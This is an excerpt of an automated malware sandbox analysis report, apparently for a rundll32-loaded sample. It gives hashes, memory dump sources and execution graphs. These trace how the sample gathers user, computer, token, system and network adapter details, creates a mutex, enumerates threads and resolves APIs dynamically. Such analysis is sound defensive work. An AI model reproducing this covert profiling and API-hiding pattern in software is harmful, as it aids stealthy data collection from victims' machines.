        • Snapshot File: hcaresult_3_3_1cded240000_rundll32.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 688d1271b1d8b95b3a85d4d5a732f362afcd59f68a65b111751230eba3c8f70b
        • Instruction ID: 775974a665b1b906bf2367cbfbe1ab17e2b9904eb1fdb4fc62ea5be3d82d0f85
        • Opcode Fuzzy Hash: 688d1271b1d8b95b3a85d4d5a732f362afcd59f68a65b111751230eba3c8f70b
        • Instruction Fuzzy Hash: F001F93025A9170BF7A9B77D7880BE373C1F795310F548076D80ACB245DD26C8414292
        Strings
        Memory Dump Source
        • Source File: 00000003.00000003.1688223900.000001CDED240000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001CDED240000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_3_1cded240000_rundll32.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID: $XVd
        • API String ID: 1279760036-811571918
        • Opcode ID: f475fc55844db6e8131c602c2d339803e9576b42789618c8742c8cae5d8b7649
        • Instruction ID: f4d8d6fa90df67b4cdb72e50fe8d43e3bd116f6f8365ea3b82592b5a058204aa
        • Opcode Fuzzy Hash: f475fc55844db6e8131c602c2d339803e9576b42789618c8742c8cae5d8b7649
        • Instruction Fuzzy Hash: 71225D30618B488FE768DF2CD445BABB7E1FB98710F50462DE09AC7292DF35E8418B56

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true
        • Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd
        Similarity
        • API ID: QueryVirtual
        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
        • API String ID: 1804819252-1534286854
        • Opcode ID: 2312e9ff84ee54667947e5eeae78843df0f435bf47361401cdb874d59acbb16c
        • Instruction ID: 6a97d4bb491070e8594bb67ae03461a4cc9377e4ad45be089ed4600be237cd44
        • Opcode Fuzzy Hash: 2312e9ff84ee54667947e5eeae78843df0f435bf47361401cdb874d59acbb16c
        • Instruction Fuzzy Hash: 5A51B37AE05E068AEB109B52D8406AD37A0FF65BA4F484170DE2D677B4DF3CE445C348

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000003.00000002.4122907159.00007FFE13301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE13300000, based on PE: true
        • Associated: 00000003.00000002.4122892367.00007FFE13300000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122944958.00007FFE13342000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4122968321.00007FFE13347000.00000004.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_7ffe13300000_rundll32.jbxd
        Similarity
        • API ID: Sleep_amsg_exit
        • String ID:
        • API String ID: 1015461914-0
        • Opcode ID: 4431f891fefb1190ea9beb5eab1e6e86d3abe6f1424f242ec69b093df556b819
        • Instruction ID: 5a986548a1b425f342362f088ad3628d05b693bfb8ad442a2e3f2891c1e00fd4
        • Opcode Fuzzy Hash: 4431f891fefb1190ea9beb5eab1e6e86d3abe6f1424f242ec69b093df556b819
        • Instruction Fuzzy Hash: B4415E39E08E4689F7698B17D95023E23A0BF687A8F0440B1DD6DA77B0DE3CE9419349

        Execution Graph

        Execution Coverage:3.8%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:4.7%
        Total number of Nodes:488
        Total number of Limit Nodes:9
        execution_graph 16636 1e8c8754eda 16637 1e8c8754eff 16636->16637 16638 1e8c8754f67 RtlRemoveVectoredExceptionHandler 16637->16638 16639 1e8c8754f7e 16637->16639 16638->16639 16224 1e8c875e160 16227 1e8c8750cd0 16224->16227 16226 1e8c875e176 16228 1e8c8750ceb 16227->16228 16229 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16228->16229 16231 1e8c8750cf7 16228->16231 16230 1e8c8750d49 16229->16230 16230->16231 16232 1e8c874d5c0 LdrGetProcedureAddress 16230->16232 16231->16226 16232->16230 16487 1e8c876ea60 16489 1e8c876ea89 16487->16489 16488 1e8c876eb37 16489->16488 16491 1e8c8745bb0 16489->16491 16492 1e8c8745bc6 16491->16492 16494 1e8c8745db3 16492->16494 16495 1e8c8742250 16492->16495 16494->16488 16497 1e8c87422a4 16495->16497 16496 1e8c87424d6 16496->16492 16497->16496 16498 1e8c87546c0 2 API calls 16497->16498 16498->16496 16233 1e8c876cf50 16234 1e8c876cf6e 16233->16234 16237 1e8c875c4c0 16234->16237 16236 1e8c876d02a 16240 1e8c8750580 16237->16240 16239 1e8c875c4e8 16239->16236 16242 1e8c875059b 16240->16242 16241 1e8c87505a7 16241->16239 16242->16241 16243 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16242->16243 16244 1e8c87505fc 16243->16244 16244->16241 16245 1e8c874d5c0 LdrGetProcedureAddress 16244->16245 16245->16244 16312 1e8c874c9c0 16315 1e8c874c9f1 16312->16315 16313 1e8c874caa2 16315->16313 16316 1e8c875b3f0 16315->16316 16318 1e8c875b420 16316->16318 16317 1e8c875b490 16317->16315 16318->16317 16319 1e8c87546c0 2 API calls 16318->16319 16319->16317 16320 1e8c8762bc0 16321 1e8c8762bdf 16320->16321 16323 1e8c8762bef 16321->16323 16324 1e8c8750190 16321->16324 16325 1e8c87501a6 16324->16325 16326 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16325->16326 16328 1e8c87501b0 16325->16328 16327 1e8c87501f9 16326->16327 16327->16328 16329 1e8c874d5c0 LdrGetProcedureAddress 16327->16329 16328->16323 16330 1e8c875021e 16329->16330 16331 1e8c874d5c0 LdrGetProcedureAddress 16330->16331 16331->16328 16332 1e8c8763bc0 16335 1e8c874f980 16332->16335 16334 1e8c8763bdd 16336 1e8c874f997 16335->16336 16337 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16336->16337 16339 1e8c874f9a1 16336->16339 16338 1e8c874f9f3 16337->16338 16338->16339 16340 1e8c874d5c0 LdrGetProcedureAddress 16338->16340 16339->16334 16341 1e8c874fa18 16340->16341 16342 1e8c874d5c0 LdrGetProcedureAddress 16341->16342 16342->16339 16503 1e8c876cc40 16505 1e8c876cc60 16503->16505 16504 1e8c876ccbc 16505->16504 16507 1e8c87650e0 16505->16507 16508 1e8c87651db 16507->16508 16509 1e8c87651e9 16508->16509 16513 1e8c876ccf0 16508->16513 16509->16504 16511 1e8c876546e 16511->16509 16512 1e8c875b3f0 2 API calls 16511->16512 16512->16511 16518 1e8c874fbf0 16513->16518 16516 1e8c8750dc0 2 API calls 16517 1e8c876cd0f 16516->16517 16517->16511 16520 1e8c874fc0b 16518->16520 16519 1e8c874fc67 16521 1e8c874fc17 16519->16521 16522 1e8c874d5c0 LdrGetProcedureAddress 16519->16522 16520->16519 16520->16521 16523 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16520->16523 16521->16516 16522->16519 16523->16519 16246 1e8c8756730 16247 1e8c8756751 16246->16247 16249 1e8c8756761 16247->16249 16250 1e8c874f7e0 16247->16250 16251 1e8c874f81c 16250->16251 16252 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16251->16252 16253 1e8c874f829 16252->16253 16254 1e8c874f87f 16253->16254 16255 1e8c874d5c0 LdrGetProcedureAddress 16253->16255 16254->16249 16255->16253 16343 1e8c87599b0 16344 1e8c8750580 2 API calls 16343->16344 16345 1e8c87599dd 16344->16345 16354 1e8c8750280 16345->16354 16353 1e8c87599f1 16355 1e8c875029b 16354->16355 16356 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16355->16356 16358 1e8c87502a7 16355->16358 16357 1e8c87502f9 16356->16357 16357->16358 16359 1e8c874d5c0 LdrGetProcedureAddress 16357->16359 16360 1e8c8750af0 16358->16360 16359->16357 16361 1e8c8750b0b 16360->16361 16362 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16361->16362 16363 1e8c8750b17 16361->16363 16364 1e8c8750b67 16362->16364 16366 1e8c8750a00 16363->16366 16364->16363 16365 1e8c874d5c0 LdrGetProcedureAddress 16364->16365 16365->16364 16367 1e8c8750a1b 16366->16367 16368 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16367->16368 16370 1e8c8750a27 16367->16370 16369 1e8c8750a79 16368->16369 16369->16370 16371 1e8c874d5c0 LdrGetProcedureAddress 16369->16371 16372 1e8c874fb30 16370->16372 16371->16369 16373 1e8c874fb45 16372->16373 16374 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16373->16374 16376 1e8c874fb4f 16373->16376 16375 1e8c874fba1 16374->16375 16375->16376 16377 1e8c874d5c0 LdrGetProcedureAddress 16375->16377 16376->16353 16377->16376 16524 1e8c875b830 16525 1e8c875b857 16524->16525 16526 1e8c875b887 16525->16526 16528 1e8c8756d90 16525->16528 16529 1e8c8750910 2 API calls 16528->16529 16530 1e8c8756da5 16529->16530 16530->16526 16668 1e8c87592b0 16669 1e8c87592d0 16668->16669 16670 1e8c87592e0 16669->16670 16671 1e8c8750eb0 2 API calls 16669->16671 16671->16670 16534 1e8c876d230 16552 1e8c8750370 16534->16552 16539 1e8c8750820 2 API calls 16540 1e8c876d257 16539->16540 16541 1e8c8750be0 2 API calls 16540->16541 16545 1e8c876d25c 16541->16545 16542 1e8c876d407 16543 1e8c876d496 16544 1e8c874aa70 2 API calls 16543->16544 16544->16542 16545->16542 16545->16543 16564 1e8c874aa70 16545->16564 16547 1e8c876d3aa 16547->16542 16547->16543 16548 1e8c876d3c9 16547->16548 16569 1e8c875a2a0 16548->16569 16550 1e8c876d3f4 16551 1e8c874aa70 2 API calls 16550->16551 16551->16542 16553 1e8c8750385 16552->16553 16554 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16553->16554 16555 1e8c875038f 16553->16555 16556 1e8c87503dc 16554->16556 16558 1e8c8750420 16555->16558 16556->16555 16557 1e8c874d5c0 LdrGetProcedureAddress 16556->16557 16557->16555 16559 1e8c8750435 16558->16559 16560 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16559->16560 16562 1e8c875043f 16559->16562 16561 1e8c8750491 16560->16561 16561->16562 16563 1e8c874d5c0 LdrGetProcedureAddress 16561->16563 16562->16539 16563->16562 16582 1e8c87504d0 16564->16582 16567 1e8c8750cd0 2 API calls 16568 1e8c874aa8a 16567->16568 16568->16547 16570 1e8c875a2d6 16569->16570 16574 1e8c875a324 16569->16574 16571 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16570->16571 16572 1e8c875a312 16571->16572 16573 1e8c874d5c0 LdrGetProcedureAddress 16572->16573 16572->16574 16573->16574 16575 1e8c875a609 16574->16575 16576 1e8c875a712 16574->16576 16581 1e8c875a61f 16574->16581 16588 1e8c8758900 16575->16588 16577 1e8c8758ac0 LdrGetProcedureAddress 16576->16577 16577->16581 16579 1e8c875a616 16579->16581 16592 1e8c8758ac0 16579->16592 16581->16550 16583 1e8c8750509 16582->16583 16584 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16583->16584 16585 1e8c8750516 16584->16585 16586 1e8c874aa85 16585->16586 16587 1e8c874d5c0 LdrGetProcedureAddress 16585->16587 16586->16567 16587->16585 16589 1e8c8758935 16588->16589 16590 1e8c874d5c0 LdrGetProcedureAddress 16589->16590 16591 1e8c8758946 16590->16591 16591->16579 16593 1e8c8758aeb 16592->16593 16594 1e8c874d5c0 LdrGetProcedureAddress 16593->16594 16595 1e8c8758afc 16594->16595 16595->16581 16256 1e8c874ff18 16257 1e8c874ff2a 16256->16257 16258 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16257->16258 16259 1e8c874ff37 16258->16259 16260 1e8c874ff88 16259->16260 16261 1e8c874d5c0 LdrGetProcedureAddress 16259->16261 16261->16259 16069 1e8c8747520 16070 1e8c8747545 16069->16070 16084 1e8c87429c0 16070->16084 16072 1e8c8747612 16099 1e8c87429a0 16072->16099 16074 1e8c87481bc 16110 1e8c8749500 16074->16110 16076 1e8c87482c8 16077 1e8c8748314 RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 16076->16077 16078 1e8c8748348 16077->16078 16114 1e8c87624c0 GetUserNameW GetComputerNameExW 16078->16114 16080 1e8c8748473 16083 1e8c8748350 16083->16080 16126 1e8c8751b00 16083->16126 16131 1e8c87491f0 16083->16131 16135 1e8c8750670 16084->16135 16086 1e8c87429c9 16139 1e8c874a830 16086->16139 16094 1e8c87429df 16155 1e8c8754ee0 16094->16155 16096 1e8c8750516 16097 1e8c875056c 16096->16097 16159 1e8c874d5c0 16096->16159 16097->16072 16170 1e8c874ffb0 16099->16170 16105 1e8c87429b3 16106 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16105->16106 16107 1e8c874f829 16106->16107 16108 1e8c874f87f 16107->16108 16109 1e8c874d5c0 LdrGetProcedureAddress 16107->16109 16108->16074 16109->16107 16188 1e8c87624a0 16110->16188 16113 1e8c8749597 16113->16076 16115 1e8c8762587 GetComputerNameExW 16114->16115 16116 1e8c8762571 16114->16116 16117 1e8c87625af 16115->16117 16116->16115 16118 1e8c87625b3 GetTokenInformation 16117->16118 16119 1e8c87625dc 16117->16119 16118->16119 16120 1e8c876266a GetNativeSystemInfo 16119->16120 16123 1e8c8762693 16120->16123 16121 1e8c876274f GetAdaptersInfo 16122 1e8c876279d 16121->16122 16125 1e8c876277b 16121->16125 16124 1e8c87627aa GetAdaptersInfo 16122->16124 16122->16125 16123->16121 16124->16125 16125->16083 16190 1e8c8750eb0 16126->16190 16128 1e8c8751b30 16130 1e8c8751dd6 16128->16130 16196 1e8c87546c0 16128->16196 16130->16083 16132 1e8c874920e 16131->16132 16133 1e8c87546c0 2 API calls 16132->16133 16134 1e8c874941f 16132->16134 16133->16134 16134->16083 16136 1e8c87506d7 16135->16136 16138 1e8c875068d 16135->16138 16136->16086 16137 1e8c874d5c0 LdrGetProcedureAddress 16137->16138 16138->16136 16138->16137 16140 1e8c874a856 16139->16140 16141 1e8c87429ce 16140->16141 16163 1e8c874a8b0 RtlAddVectoredExceptionHandler 16140->16163 16143 1e8c87500a0 16141->16143 16144 1e8c87500b9 16143->16144 16145 1e8c87429d3 16143->16145 16144->16145 16146 1e8c874d5c0 LdrGetProcedureAddress 16144->16146 16147 1e8c8750120 16145->16147 16146->16144 16148 1e8c8750139 16147->16148 16149 1e8c87429d8 16147->16149 16148->16149 16150 1e8c874d5c0 LdrGetProcedureAddress 16148->16150 16151 1e8c8751750 16149->16151 16150->16148 16153 1e8c875185d 16151->16153 16154 1e8c8751a48 16153->16154 16165 1e8c875cad0 16153->16165 16154->16094 16156 1e8c8754eff 16155->16156 16157 1e8c8754f67 RtlRemoveVectoredExceptionHandler 16156->16157 16158 1e8c8754f7e 16156->16158 16157->16158 16158->16096 16161 1e8c874d5fb 16159->16161 16160 1e8c874d69f 16160->16096 16161->16160 16162 1e8c874d67b LdrGetProcedureAddress 16161->16162 16162->16160 16164 1e8c874a8d7 16163->16164 16164->16141 16166 1e8c875caf0 16165->16166 16167 1e8c875cb13 CreateToolhelp32Snapshot 16166->16167 16168 1e8c875cb39 Thread32First 16167->16168 16169 1e8c875cb5a 16167->16169 16168->16169 16169->16154 16171 1e8c874ffcb 16170->16171 16172 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16171->16172 16174 1e8c87429a9 16171->16174 16173 1e8c875002c 16172->16173 16173->16174 16175 1e8c874d5c0 LdrGetProcedureAddress 16173->16175 16176 1e8c874fa80 16174->16176 16175->16173 16177 1e8c874fab7 16176->16177 16178 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16177->16178 16181 1e8c874fac4 16178->16181 16179 1e8c87429ae 16182 1e8c8750fa0 16179->16182 16180 1e8c874d5c0 LdrGetProcedureAddress 16180->16181 16181->16179 16181->16180 16183 1e8c8750fbb 16182->16183 16184 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16183->16184 16186 1e8c8750fc7 16183->16186 16185 1e8c8751019 16184->16185 16185->16186 16187 1e8c874d5c0 LdrGetProcedureAddress 16185->16187 16186->16105 16187->16185 16189 1e8c874951e CreateMutexExA 16188->16189 16189->16113 16191 1e8c8750ecb 16190->16191 16192 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16191->16192 16193 1e8c8750ed7 16191->16193 16195 1e8c8750f27 16192->16195 16193->16128 16194 1e8c874d5c0 LdrGetProcedureAddress 16194->16195 16195->16193 16195->16194 16197 1e8c8754752 16196->16197 16198 1e8c87547ca 16197->16198 16199 1e8c8754a58 16197->16199 16215 1e8c8747650 16198->16215 16201 1e8c8747650 2 API calls 16199->16201 16203 1e8c8754b00 16201->16203 16202 1e8c8747650 2 API calls 16202->16203 16203->16202 16209 1e8c8754c6c 16203->16209 16210 1e8c8754ba1 16203->16210 16204 1e8c8747650 2 API calls 16205 1e8c875485e 16204->16205 16205->16204 16208 1e8c8754994 16205->16208 16205->16209 16206 1e8c8747650 2 API calls 16206->16208 16207 1e8c8747650 2 API calls 16207->16210 16208->16206 16208->16210 16209->16130 16210->16207 16210->16209 16212 1e8c8754caf 16210->16212 16211 1e8c8747650 2 API calls 16211->16212 16212->16209 16212->16211 16214 1e8c8754d9f 16212->16214 16213 1e8c8747650 2 API calls 16213->16214 16214->16209 16214->16213 16218 1e8c874fce0 16215->16218 16217 1e8c8747684 16217->16205 16219 1e8c874fcfb 16218->16219 16220 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16219->16220 16222 1e8c874fd07 16219->16222 16221 1e8c874fd59 16220->16221 16221->16222 16223 1e8c874d5c0 LdrGetProcedureAddress 16221->16223 16222->16217 16223->16221 16262 1e8c8764120 16263 1e8c876413b 16262->16263 16265 1e8c876414b 16263->16265 16266 1e8c8751090 16263->16266 16268 1e8c87510ab 16266->16268 16267 1e8c87510b7 16267->16265 16268->16267 16269 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16268->16269 16270 1e8c8751109 16269->16270 16270->16267 16271 1e8c874d5c0 LdrGetProcedureAddress 16270->16271 16271->16270 16676 1e8c8766ea0 16677 1e8c8766ec1 16676->16677 16678 1e8c874f7e0 2 API calls 16677->16678 16681 1e8c8766eee 16677->16681 16679 1e8c8766ee1 16678->16679 16682 1e8c874f890 16679->16682 16683 1e8c874f8ab 16682->16683 16684 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16683->16684 16686 1e8c874f8b7 16683->16686 16685 1e8c874f909 16684->16685 16685->16686 16687 1e8c874d5c0 LdrGetProcedureAddress 16685->16687 16686->16681 16687->16685 16688 1e8c876daa0 16690 1e8c876dabb 16688->16690 16689 1e8c876db08 16690->16689 16692 1e8c8755d60 16690->16692 16694 1e8c8755de9 16692->16694 16693 1e8c8755f49 16693->16689 16694->16693 16695 1e8c8742250 2 API calls 16694->16695 16695->16694 16385 1e8c8758b90 16386 1e8c8750cd0 2 API calls 16385->16386 16387 1e8c8758bbd 16386->16387 16392 1e8c8751180 16387->16392 16389 1e8c8758c6a 16390 1e8c8758bc2 16390->16389 16398 1e8c875d510 16390->16398 16393 1e8c875119b 16392->16393 16394 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16393->16394 16396 1e8c87511a7 16393->16396 16395 1e8c87511fc 16394->16395 16395->16396 16397 1e8c874d5c0 LdrGetProcedureAddress 16395->16397 16396->16390 16397->16395 16399 1e8c8751180 2 API calls 16398->16399 16400 1e8c875d545 16399->16400 16400->16390 16401 1e8c876a190 16402 1e8c874f7e0 2 API calls 16401->16402 16403 1e8c876a1aa 16402->16403 16404 1e8c8750a00 2 API calls 16403->16404 16405 1e8c876a1af 16404->16405 16409 1e8c875ff90 16418 1e8c8750730 16409->16418 16417 1e8c875ffba 16419 1e8c875074b 16418->16419 16420 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16419->16420 16421 1e8c8750757 16419->16421 16423 1e8c87507a7 16420->16423 16424 1e8c8750820 16421->16424 16422 1e8c874d5c0 LdrGetProcedureAddress 16422->16423 16423->16421 16423->16422 16425 1e8c875083b 16424->16425 16426 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16425->16426 16428 1e8c8750847 16425->16428 16427 1e8c875089c 16426->16427 16427->16428 16429 1e8c874d5c0 LdrGetProcedureAddress 16427->16429 16430 1e8c874f6e0 16428->16430 16429->16427 16431 1e8c874f6f6 16430->16431 16432 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16431->16432 16433 1e8c874f700 16431->16433 16434 1e8c874f755 16432->16434 16438 1e8c8750be0 16433->16438 16434->16433 16435 1e8c874d5c0 LdrGetProcedureAddress 16434->16435 16436 1e8c874f77a 16435->16436 16437 1e8c874d5c0 LdrGetProcedureAddress 16436->16437 16437->16433 16439 1e8c8750bf6 16438->16439 16440 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16439->16440 16442 1e8c8750c00 16439->16442 16441 1e8c8750c50 16440->16441 16441->16442 16443 1e8c874d5c0 LdrGetProcedureAddress 16441->16443 16442->16417 16444 1e8c8750c75 16443->16444 16445 1e8c874d5c0 LdrGetProcedureAddress 16444->16445 16445->16442 16599 1e8c8762210 16602 1e8c8761d00 16599->16602 16601 1e8c876221f 16603 1e8c8761d2c 16602->16603 16604 1e8c8750be0 2 API calls 16603->16604 16613 1e8c876209f 16603->16613 16605 1e8c8761d3f 16604->16605 16606 1e8c87504d0 2 API calls 16605->16606 16609 1e8c8761d51 16606->16609 16607 1e8c874aa70 2 API calls 16607->16613 16608 1e8c8761ddf 16608->16607 16608->16613 16609->16608 16616 1e8c874d080 16609->16616 16611 1e8c8761efc 16611->16608 16612 1e8c874aa70 2 API calls 16611->16612 16614 1e8c8761f2d 16612->16614 16613->16601 16614->16608 16615 1e8c874aa70 2 API calls 16614->16615 16615->16608 16617 1e8c874d0c6 16616->16617 16621 1e8c874d0ce 16616->16621 16618 1e8c87565e0 RtlRemoveVectoredExceptionHandler 16617->16618 16618->16621 16619 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16619->16621 16620 1e8c874d0d3 16620->16611 16621->16619 16621->16620 16622 1e8c874d5c0 LdrGetProcedureAddress 16621->16622 16622->16621 16696 1e8c875f090 16697 1e8c875f0b4 16696->16697 16698 1e8c8750cd0 2 API calls 16697->16698 16699 1e8c875f0b9 16698->16699 16446 1e8c8742580 16447 1e8c8750fa0 2 API calls 16446->16447 16448 1e8c874258f 16447->16448 16452 1e8c8757f6c 16453 1e8c8757f7d 16452->16453 16455 1e8c8757f9f 16453->16455 16458 1e8c87565e0 16453->16458 16457 1e8c8757fb1 16455->16457 16461 1e8c875c830 16455->16461 16459 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16458->16459 16460 1e8c87565f4 16459->16460 16460->16455 16463 1e8c875c898 16461->16463 16462 1e8c875c950 16462->16455 16463->16462 16464 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16463->16464 16465 1e8c875c9c2 16464->16465 16465->16462 16466 1e8c874d5c0 LdrGetProcedureAddress 16465->16466 16466->16462 16629 1e8c875b9f0 16632 1e8c875ba0f 16629->16632 16630 1e8c875ba7d 16631 1e8c875be70 2 API calls 16631->16630 16632->16630 16632->16631 16707 1e8c875aa70 16708 1e8c875aa86 16707->16708 16709 1e8c8750910 2 API calls 16708->16709 16710 1e8c875aaba 16709->16710 16711 1e8c875acdb 16710->16711 16712 1e8c875be70 2 API calls 16710->16712 16712->16710 16713 1e8c8770a72 16714 1e8c8770a7d 16713->16714 16715 1e8c8750730 2 API calls 16714->16715 16716 1e8c8770a9e 16715->16716 16717 1e8c8750820 2 API calls 16716->16717 16718 1e8c8770aa3 16717->16718 16285 1e8c87600f0 16286 1e8c8760106 16285->16286 16291 1e8c8750910 16286->16291 16288 1e8c876020f 16290 1e8c876011c 16290->16288 16297 1e8c875be70 16290->16297 16292 1e8c875092b 16291->16292 16293 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16292->16293 16296 1e8c8750937 16292->16296 16295 1e8c8750984 16293->16295 16294 1e8c874d5c0 LdrGetProcedureAddress 16294->16295 16295->16294 16295->16296 16296->16290 16300 1e8c8750dc0 16297->16300 16299 1e8c875be96 16299->16290 16301 1e8c8750ddb 16300->16301 16302 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16301->16302 16304 1e8c8750de7 16301->16304 16303 1e8c8750e37 16302->16303 16303->16304 16305 1e8c874d5c0 LdrGetProcedureAddress 16303->16305 16304->16299 16305->16303 16470 1e8c8767b70 16472 1e8c8767b8d 16470->16472 16471 1e8c8767c33 16472->16471 16474 1e8c874a020 16472->16474 16481 1e8c874fdd0 16474->16481 16476 1e8c874a048 16477 1e8c8750cd0 2 API calls 16476->16477 16478 1e8c874a05a 16477->16478 16479 1e8c8750730 2 API calls 16478->16479 16480 1e8c874a05f 16479->16480 16480->16471 16482 1e8c874fdeb 16481->16482 16483 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16482->16483 16485 1e8c874fdf7 16482->16485 16484 1e8c874fe47 16483->16484 16484->16485 16486 1e8c874d5c0 LdrGetProcedureAddress 16484->16486 16485->16476 16486->16484 16306 1e8c876c6f0 16307 1e8c876c704 16306->16307 16308 1e8c8754ee0 RtlRemoveVectoredExceptionHandler 16307->16308 16309 1e8c876c740 16307->16309 16310 1e8c876c738 16308->16310 16310->16309 16311 1e8c874d5c0 LdrGetProcedureAddress 16310->16311 16311->16309 16719 1e8c876d070 16722 1e8c876d094 16719->16722 16720 1e8c876d1fc 16721 1e8c876d1a1 16721->16720 16723 1e8c875c4c0 2 API calls 16721->16723 16722->16720 16722->16721 16724 1e8c875c4c0 2 API calls 16722->16724 16723->16720 16724->16722

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 1e8c87624c0-1e8c876256f GetUserNameW GetComputerNameExW 1 1e8c8762587-1e8c87625b1 GetComputerNameExW call 1e8c8772730 0->1 2 1e8c8762571-1e8c8762581 call 1e8c8769480 0->2 7 1e8c8762618-1e8c8762652 call 1e8c87709b0 call 1e8c875b6f0 1->7 8 1e8c87625b3-1e8c87625da GetTokenInformation 1->8 2->1 22 1e8c876266a-1e8c8762691 GetNativeSystemInfo 7->22 23 1e8c8762654-1e8c8762665 call 1e8c8772230 7->23 9 1e8c876260e-1e8c8762613 call 1e8c8772370 8->9 10 1e8c87625dc-1e8c87625e8 8->10 9->7 12 1e8c87625fe-1e8c8762609 call 1e8c8772230 10->12 13 1e8c87625ea-1e8c87625f9 call 1e8c8772230 10->13 12->9 13->12 25 1e8c87626a8-1e8c87626ac 22->25 26 1e8c8762693-1e8c87626a6 22->26 23->22 28 1e8c87626ae-1e8c87626bd 25->28 29 1e8c87626d7-1e8c87626ed call 1e8c8772230 25->29 27 1e8c87626c1-1e8c87626d5 call 1e8c8772230 26->27 33 1e8c87626f2-1e8c8762702 27->33 28->27 29->33 35 1e8c8762749-1e8c8762779 GetAdaptersInfo 33->35 36 1e8c8762704-1e8c8762744 call 1e8c8771fe0 call 1e8c8772230 call 1e8c8771fe0 * 2 33->36 40 1e8c876279d-1e8c87627a3 35->40 41 1e8c876277b-1e8c876279c call 1e8c87694a0 * 2 35->41 36->35 40->41 44 1e8c87627a5-1e8c87627bd call 1e8c8769480 GetAdaptersInfo 40->44 44->41 53 1e8c87627bf-1e8c87627cc 44->53 55 1e8c87627d2-1e8c87627d5 53->55 55->41 56 1e8c87627d7-1e8c87627d8 55->56 57 1e8c87627df-1e8c87627f1 call 1e8c8749a00 56->57 60 1e8c8762805-1e8c876280c 57->60 61 1e8c87627f3-1e8c8762803 call 1e8c8772230 57->61 60->41 63 1e8c8762812-1e8c8762822 call 1e8c8772230 60->63 61->57 63->55
        APIs
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
        • String ID:
        • API String ID: 1596153048-0
        • Opcode ID: 4a85e9ad04f57a8671d90e2dd50e5492fee8be09ab17e15441e30e40a0fcfe5b
        • Instruction ID: 0aa0c1f941e3d51c4024b1f579bf372fff222eb4f75f4a968a106b2bfe763f33
        • Opcode Fuzzy Hash: 4a85e9ad04f57a8671d90e2dd50e5492fee8be09ab17e15441e30e40a0fcfe5b
        • Instruction Fuzzy Hash: FCA1C630238B448BEB54AB14D856BDEF3D2FB95310F50452DA84EC3296EE74F985CB92

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000005.00000002.4122764540.000001E8C8741000.00000020.00000800.00020000.00000000.sdmp, Offset: 000001E8C8741000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_5_2_1e8c8741000_rundll32.jbxd
        Similarity
        • API ID: CreateFirstSnapshotThread32Toolhelp32
        • String ID: 0
        • API String ID: 490256885-4108050209
        • Opcode ID: 56b387516ff4cea3dc33e5ee412a7af7dd174eee44575f0d6583827be0e4a923
        • Instruction ID: 0cc593a39c1c534608afd16e3e84917c61f272ed4d84fe97a1a1ab3fcd793abe
